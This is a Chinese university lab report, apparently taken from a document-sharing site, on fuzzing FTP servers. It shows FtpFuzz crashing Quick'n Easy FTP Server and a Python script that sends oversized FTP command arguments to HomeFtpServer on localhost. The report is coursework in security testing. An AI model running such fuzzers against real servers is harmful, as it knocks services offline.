欢迎来到天天文库
浏览记录
ID:19456372
大小:1.20 MB
页数:10页
时间:2018-10-02
《软件安全实验第五次实验报告》由会员上传分享,免费在线阅读,更多相关内容在行业资料-天天文库。
1、软件安全第五次实验报告班级:2010211316学号:10211593姓名:曹梦晨1、目标(1)了解fuzz的基本原理(2)通过FtpFuzz来fuzzeasyftpserver的服务器,使服务器停止工作(3)自己编写或修改Python脚本来自己编写FTPFUZZ简单工具,并用其来对HomeFtpServer进行Fuzz,使服务器停止工作,可以用OllyDbg附加查看异常。(4)作业要求:a)详述跟踪调试过程b)实验结果需要截图证明c)提交生成的畸形文件,fuzz程序源代码等文件(5)思考题开发一个针对文件溢
2、出的目标程序的fuzz程序,使目标程序崩溃。要求生成攻击测试文件并通过程序自动加载,并确定从哪个文件开始出现程序崩溃。2、测试步骤与结果2.1利用FtpFuzz进行攻击Step1:首先利用Quick'nEasyFTPServer搭建服务器图2-1利用Quick'nEasyFTPServer搭建服务器设置匿名用户、开启下载权限并设置ftp的路径为d:test,然后开启服务器:图2-2配置Quick'nEasyFTPServer图2-3配置Quick'nEasyFTPServer(2)图2-4配置Quick'n
3、EasyFTPServer(3)Step2:利用FtpFuzz.exe进行fuzz攻击首先对攻击的参数进行配置:图2-5配置FtpFuzz图2-6配置FtpFuzz(2)使用ipconfig指令查看本机ip地址,对FtpFuzz进行配置:图2-7查看本机ip地址图2-8配置FtpFuzz(3)图2-9配置点击start进行fuzz攻击图2-10服务器端数据接收情况可能由于系统的原因,fuzz并没有成功。所以果断转战windowsxpsp3,和之前配置一样,在虚拟机中进行了Fuzz攻击实验,结果如下:图2-11
4、xp下实验结果示意图这里可以看到服务器受到Fuzz攻击后,已经崩溃,攻击成功!2.2利用python脚本进行攻击Step1:首先配置HomeFtpServer图2-12配置HomeFtpServer图2-13启动HomeFtpServer图2-14使用IDLE打开fuzz.py由于下载的python编译器版本为3.3.2,print函数和send函数的用法都要修改,在查找了网上资料后,将代码修改如下:importsocket,sysdefftp_test(ip,port1):target=ipport=por
5、t1buf=b'a'*272j=1fuzzcmd=[b'mdelete',b'cd',b'mkdir',b'delete',b'cwd',b'mdir',b'mput',b'mls',b'rename',b'siteindex']s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)try:connct=s.connect((target,port))print('[+]Connected!')except:print('[!]ConnectionFailed!'
6、)sys.exit(0)s.recv(1024)s.send(b'USERtestr')s.recv(1024)s.send(b'PASS123456r')s.recv(1024)print('[+]Sendingpayload...')foriinfuzzcmd:s.send(i+buf*j+b'r')s.send(i+buf*j*4+b'r')s.send(i+buf*j*8+b'r')s.send(i+buf*j*40+b'r')try:s.recv(1024)pri
7、nt('[!]Fuzzfailed!')except:print('[+]Maybewefindabug!')if__name__=='__main__':ftp_test(b'127.0.0.1',21)运行fuzz.py,程序运行结果如下所示:图2-15程序运行结果图2-16服务器端状况3、测试结论我还能说些什么呢?win7下的安全机制导致fuzz攻击都失效,每次实验都遭到win7系统的荼毒,虽然多次失败,但是让我加深了对win7的认识。转到虚拟机中的winxp时,就会成功。上次想利用函数的固定地址来解决
8、win7的,后来发现有一个api可以解决这个问题,即GetProcAddress(),可以获取对应api的地址。4、思考题开发一个针对文件溢出的目标程序的fuzz程序,使目标程序崩溃。要求生成攻击测试文件并通过程序自动加载,并确定从哪个文件开始出现程序崩溃。这里已知overflow_exe.exe调用了password.txt,并读取了其中的信息,所以尝试向其中写入fuzz数据,并不停增加数据量,直
此文档下载收益归作者所有